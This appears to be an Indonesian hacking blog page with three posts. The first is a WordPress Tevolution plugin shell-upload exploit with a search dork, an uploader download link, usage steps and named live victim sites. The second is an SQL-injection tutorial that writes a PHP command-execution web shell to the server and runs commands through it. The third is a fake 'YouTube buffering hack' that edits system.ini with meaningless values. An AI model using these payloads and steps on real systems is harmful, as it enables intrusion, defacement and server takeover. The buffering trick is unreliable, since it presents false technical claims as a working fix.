MAINTENANCE SITE

Selasa, 29 November 2016

Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability

######################
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
# Vendor Homepage : https://templatic.com/
# version : 2.3.1
# Tools by @MasterZombie :Shell Uploader:https://userscloud.com/eqdkxph1lmwt
######################
# [+] DESCRIPTION :
######################
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
# [+] Some of the features it enables include custom post types, monetization options, custom fields…
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
######################
# [+] USAGE :
######################
# 1.- Download Wordpress Tevolution Plugin Arbitrary Shell Uploader:https://userscloud.com/eqdkxph1lmwt
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Uploader
# 4.- Upload Your File using Tamperdata : shell.php.jpg or shell.php.txt
######################
# [+] Dev!l Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/zombie.php
######################
# [+] Live Demo :
######################
# http://guiagronicaragua.com
# http://eventsinsuriname.com
http://localhoneymarket.2base.in/PakistanZindabad.html
http://www.zone-h.org/mirror/id/26679997
http://demo-uat.com/
http://www.zone-h.org/mirror/id/26679960

SQLi to PHP Shell Upload

23.06 No comments

Salam From MasterZombie

THis is just a little tip on what you can do if your SQLi vulnerable site doesn't have valuable information in the database.

I am not going to go too deep into every single move but if you have basic knowledge in Web application hacking I think you will understand what I am doing.

First we have our SQL Injection vulnerable site:

Code:

www.target.com/index.php?id=-1 union select 1,2,3--

Now we would like to know the directory we are currently in, we have a great command for this:

Code:

www.target.com/index.php?id=-1 union select 1,2,@@datadir--

Ah, splending, it outputs: /var/www/html/

Now, what we would like to do is try to save a file on the server, like this:

Code:

www.target.com/index.php?id=-1 union select null,null,'test' INTO OUTFILE '/var/www/html/test.txt'--

To check if this worked, we would go to http://www.target.com/test.txt

If you see a empty document with only the word "test" printed on the screen, then we are good to go.

As for the actual fun, we are now going to upload a simple PHP shell on our target:

Code:

www.target.com/index.php?id=-1 union+select+null,null,'<?php%20@system($_REQUEST["cmd"]);%20?>'+INTO+DUMPFILE+'/var/www/html/shell.php'--

and now we try if the shell works by visiting and choose a command to execute:

Code:

www.target.com/shell.php?cmd=uname -a

You know the deal, if it returns something like:

"Linux target 2.6.18-blablabla #1 SMP Fri Dec 17 13:37:00 2010 i686 athlon i1337 GNU/Linux"

Then it means it worked.

Hack Bufering Youtube

09.37 No comments

Assallamualaikum Brow,... ^_^

Oke Langsung Saja,..
Kita Praktekin Langsung,....
Cara Hack Bufering Youtube,....

Langkah Langkahnya Sangat Mudah Kog,..
Dan Hasilnya Juga Mantaaab,....
Yuk,.. Kita Coba,....

Langkah ( 1 )
Persiapkan Video Di Youtube yang akan anda Putar
Entah itu Music / Film
Misalkan Kita Mau Dengerin Music / Video Clips
Dengan Mengetik Nama Band Yang Anda Sukai,..
Tapi Jangan Di Play Dulu ya,...

Setelah Youtube Sudah Anda Siapkan
Lalu Coba Anda Ketik CMD Pada Run Lalu Tekan Enter
Dan Setelah Keluar Kotak Hitam Seperti Pada Gambar ini,..

Lalu ketik → system.ini
Coba Perhatikan Pada Gambarnya Kalau Anda Masih Bingung

Langkah ( 2 )
Setelah Anda Mengetikan txt → system.ini ,
pada kotak hitam seperti pada gambar tersebut
Lalu Tekan Enter dan akan keluar
Notepad yang berisi Code Code
Seperti Gambar Di Bawah Ini

Langkah ( 3 )
Setelah Keluar Code Code Seperti Gambar yang anda lihat pada Gambar diatas tadi
Lalu Ganti Semuanya Code Code tersebut
Dengan Code Di Bawah Ini

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps

Anda Copy Codenya dan Paste Pada Notepad Tadi
Dan Hasilnya Seperti Pada Gambar Di Bawah Ini

Lalu Langsung Saja Save As / Simpan
Dan Coba Anda Jalankan Video Di Youtube Yang Sudah Anda Siapkan Tadi
Oke Selamat Mencoba ^_^

Dan Ini Adalah Bukti Foto dari SS atau screenshot
Baru tekan Play Di Jamin Langsung Kenceng Tanpa Bufering,..

Oh iya,... Buat Yang Masih Bingung
Bila kesulitan Di Saat Buka Gambarnya,..
Coba Anda Klick Kanan Pada Gambar
Lalu Pilih View Image Lalu Klick ^_^

Atau Anda juga Bisa Pakai Cara ini
Pertama Klick Kanan Pada Gambar
Lalu Pilih Copy Image Location
Sebagai Contoh Lihat Gambar Berikut ini

Coba Klick Gambarnya,..